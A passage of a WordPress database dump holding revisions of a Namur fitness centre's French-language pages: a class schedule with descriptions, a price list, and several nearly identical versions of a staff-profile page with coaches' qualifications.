class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:11:50', '2014-01-18 19:11:50', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(420, 1, '2014-01-20 20:38:05', '2014-01-20 20:38:05', '', 'youssra_boujat_pti', '', 'inherit', 'open', 'open', '', 'youssra_boujat_pti', '', '', '2014-01-20 20:38:05', '2014-01-20 20:38:05', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(421, 1, '2014-01-20 20:38:29', '2014-01-20 20:38:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"198\" height=\"258\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2></h2>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-01-20 20:38:29', '2014-01-20 20:38:29', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(422, 1, '2014-01-20 20:39:28', '2014-01-20 20:39:28', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-01-20 20:39:28', '2014-01-20 20:39:28', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(423, 1, '2014-01-20 20:40:16', '2014-01-20 20:40:16', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et 